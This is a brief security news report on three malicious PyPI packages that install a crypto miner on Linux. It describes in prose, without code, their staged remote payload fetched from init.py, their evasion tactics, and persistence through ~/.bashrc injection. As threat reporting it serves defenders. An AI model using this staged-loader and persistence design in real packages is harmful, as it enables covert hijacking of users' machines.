Fortinet researchers identified three malicious packages in the PyPI repository—modularseven, driftme, and catme. These packages, attributed to the same author, “sastra,” were specifically crafted to target Linux systems and install crypto mining software. Notably, the author created a PyPI account shortly before uploading these packages.
3 Malicious PyPI Packages
“Upon initial use, these packages deploy a CoinMiner executable on Linux devices,” noted Fortinet FortiGuard Labs researcher Gabby Xiong. She highlighted that this campaign exhibits similarities with a previous one that utilized a package named “culturestreak” to install a crypto miner.
The malicious code is embedded in the init.py file, which decodes and fetches the first stage from a remote server. This initial stage is a shell script (“unmi.sh”) responsible for obtaining a configuration file for the mining operation and the CoinMiner file hosted on GitLab.
The ELF binary file is executed in the background using the nohup command, ensuring the process persists after session exit. Following the pattern of the earlier ‘culturestreak’ package, these packages hide their payload, reducing detectability by hosting it on a remote URL. The payload is released incrementally in different stages to carry out its malicious activities.
The connection to the culturestreak package is evident as the configuration file is hosted on the domain papiculo[.]net, and the coin mining executables are hosted on a public GitLab repository.
A notable enhancement in the three new packages is the incorporation of an additional stage, concealing their malicious intent within the shell script. This strategy aids in evading detection by security software and prolongs the exploitation process.
“Furthermore, the malware injects malicious commands into the ~/.bashrc file,” Xiong explained. “This inclusion guarantees the persistence and reactivation of the malware on the user’s device, effectively prolonging the duration of its covert operation. This approach facilitates the extended and discreet exploitation of the user’s device for the attacker’s advantage.”